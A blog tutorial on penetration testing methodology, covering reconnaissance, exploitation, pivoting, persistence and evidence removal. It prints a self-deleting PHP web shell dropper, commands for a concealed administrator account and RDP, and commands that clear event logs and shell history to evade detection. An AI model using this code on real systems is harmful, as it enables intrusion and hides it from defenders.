Fading Coder

One Final Commit for the Last Sprint

Home > Tech > Content

Systematic Network Penetration Testing: From External Reconnaissance to Internal Compromise

Tech 1

Scope Definition and Engagement Rules

Establish explicit boundaries before initiating any assessment. Define IP ranges, domain names, and excluded systems in the formal rules of engagement. Determine testing windows, emergency contacts, and authorization documentation. Black-box assessments operate with zero prior knowledge of internal architecture, simulating adversarial threats without source code access or network diagrams.

External Reconnaissance Methodology

Host Discovery and Enumeration

Initiate with comprehensive host identification using network scanners. Nessus provides detailed vulnerability signatures alongside host detection, while Nmap offers granular control over probe types and timing templates. For rapid asset discovery across vast address spaces, Masscan executes asynchronous scanning at high packet rates, though accuracy trade-offs require validation through secondary TCP SYN scans.

Service Identification and Port Analysis

Map exposed services to identify attack vectors. Critical services requiring scrutiny include:

  • SSH (22/TCP): Credential stuffing attacks againsst weak authentication
  • Rsync (873/TCP): Unauthorized module access configurations
  • MySQL (3306/TCP): Default credentials and authentication bypass
  • Redis (6379/TCP): Unauthenticated command execution interfaces
  • SMB (445/TCP): Named pipe manipulation and eternalblue-class vulnerabilities

Execute version detection scans to identify outdated service implementations vulnerable to known exploit chains.

Web Application Footprinting

Enumerate directory structures and sensitive endpoints using brute-force tools such as Dirbuster, Gobuster, or Cansina. Critical paths include administrative portals, configuration backups, database management interfaces (phpMyAdmin), and installation remnants.

Analyze robots.txt files for directory disclosure. While intended to guide search engine crawlers, these files often reveal paths requiring authentication or containing sensitive functionality:

User-agent: *
Disallow: /api/internal/
Disallow: /admin/dashboard/
Disallow: /backup/database.sql

Subdomain and Asset Discovery

Expand attack surface through subdomain enumeration using certificate transparency logs, DNS zone transfers, and dictionary-based brute forcing. Identify code repositories on GitHub or GitLab containing hardcoded API keys, database connection strings, or proprietary source code through automated search patterns.

Technology Fingerprinting

Determine underlying technologies using Whatweb or Wappalyzer to identify Content Management Systems (WordPress, Drupal, Django), web servers (Apache, Nginx, IIS), and JavaScript frameworks. Map identified technologies to specific CVE entries and publicly disclosed exploit modules.

Vulnerability Analysis

Automated Scanning Constraints

Web vulnerability scanners (AWVS, AppScan, OWASP ZAP) generate significant traffic volumes capable of destabilizing production environments. Execute during maintenance windows or against staging environments exclusively. Unauthorized automated scanning against production assets may violate computer fraud statutes.

Manual Verification Techniques

Validate automated findings and identify logic flaws through manual testing:

  • SQL Injection: Union-based extraction, blind boolean-based inference, and time-delay techniques
  • Cross-Site Scripting (XSS): Stored, reflected, and DOM-based payload delivery
  • Server-Side Request Forgery (SSRF): Internal service enumeration through URL handlers
  • XML External Entity (XXE): Out-of-band data exfiltration via DTD parameter entities
  • Insecure Deserialization: Java Object deserialization and PHP object injection
  • Remote Code Execution (RCE): Command injection through unsanitized input vectors

Initial Access and Exploitation

Web Shell Deployment

Upon discovering upload vulnerabilities or file inclusion flaws, deploy minimal web shells for persistent access. Upload functionality restrictions often permit image files; embed PHP code within JPEG EXIF data or append GIF headers to bypass magic byte validation.

Privilege Escalation Vectors

Post-compromise elevation techniques vary by platform:

Windows Environments:

  • Kernel exploits (CVE-2021-1732, CVE-2020-0787)
  • Service configuration permissions (Unquoted service paths, weak DACL permissions)
  • Credential harvesting from LSASS memory or SAM database extraction

Linux Environments:

  • SUID binary exploitation (nmap, vim, less)
  • Kernel vulnerability chains (Dirty COW, Privilege escalation via eBPF)
  • Sudoers misconfigurations allowing command execution as root

Reverse Shell Establishment

Generate platform-specific payloads using MSFvenom or Cobalt Strike Beacon. Establish encrypted command and control channels through HTTPS or DNS tunneling to evade network detection systems.

Post-Exploitation and Pivoting

Internal Network Enumeration

Compromised perimeter hosts function as launch points for internal reconnaissance. Deploy SOCKS proxies or TCP port forwards through established shells to tunnel traffic into protected network segments.

# Establish dynamic port forward through compromised host
ssh -D 9050 -N -f compromised_user@perimeter_host

# Configure proxychains for internal scanning
proxychains nmap -sT -Pn 10.0.0.0/24

Lateral Movement Tactics

Harvest credentials from memory, configuration files, and browser storage to authenticate against adjacent systems. Techniques include:

  • Pass-the-Hash: NTLM hash authentication without plaintext passwords
  • Kerberoasting: Offline cracking of service account tickets
  • Token Impersonation: Hijacking privileged process tokens on Windows systems

Active Directory Penetration

Within domain environments, target the KRBTGT account hash for Golden Ticket fabrication, enabling persistent authentication across the forest. Enumerate Active Directory trusts to identify cross-domain attack paths.

Persistence Mechanisms

Web-Based Persistence

Deploy resilient backdoors utilizing polymorphic code to evade signature-based detection:

<?php
@ini_set('max_execution_time', 0);
@ignore_user_abort(true);
@unlink(__FILE__);
$interval = 300;
$payload = base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7ID8+');
while (true) {
    $filename = 'temp_' . substr(md5(uniqid()), 0, 8) . '.php';
    @file_put_contents($filename, $payload);
    sleep($interval);
}
?>

Embed code within legitimate error pages (404.php, 500.php) or modify existing framework components.

Windows System Persistence

  • Hidden Accounts: Create administrative users with $ suffix to hide from standard user listings
  • Registry Run Keys: Add entries to HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled Tasks: Establish recurring tasks executing payloads at logon or idle intervals
  • WMI Event Subscriptions: Create permanent event consumers triggering on specific system events
net user support_388945a0 /active:yes
net localgroup administrators support_388945a0 /add
net user support_388945a0 ComplexP@ssw0rd123
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Linux System Persistence

  • SSH Key Injection: Append attacker public keys to ~/.ssh/authorized_keys
  • Cron Job Scheduling: Establish recuring tasks in crontab or /etc/cron.d/
  • Systemd Services: Create unit files executing payloads on system startup
  • LD_PRELOAD Hijacking: Intercept shared library calls through environment variables

Artifact Sanitization

Minimize forensic evidence to delay incident detection. Complete elimination of intrusion artifacts is technically impossible against sophisticated logging infrastructure; focus instead on reducing detection probability and attribution confidence.

Windows Evidence Removal

Clear event logs selectively to avoid obvious gaps in logging:

wevtutil cl System
wevtutil cl Security
wevtutil cl Application

Remove remote desktop connection artifacts from registry hives and delete Prefetch files containing executable metadata.

Linux Evidence Removal

Disable command history logging and purge existing records:

unset HISTFILE
export HISTFILESIZE=0
history -c
rm -rf ~/.bash_history
ln -sf /dev/null ~/.bash_history

Truncate system logs in /var/log/ and remove authentication records from /var/log/wtmp and /var/log/btmp using specialized utilities.

Documentation Standards

Compile findings into structured reports containing executive summaries, technical vulnerability details, risk ratings using CVSSv3 scoring, proof-of-concept demonstrations, and prioritized remediation strategies. Include network diagrams illustrating attack paths and recommended security control implementations.

Tags: Penetration TestingCybersecurityRed TeamEthical HackingVulnerability Assessment
Back to List

Prev: Integrating TensorBoard for Model Training Visualization

Next: Dynamic Poster Generation in WeChat Mini Programs Using Painter

Related Articles

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Django’s Admin panel is highly user-friendly, and pairing it with TinyMCE, an effective rich text editor, simplifies content management significantly. Combining the two is particular useful for bloggi...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top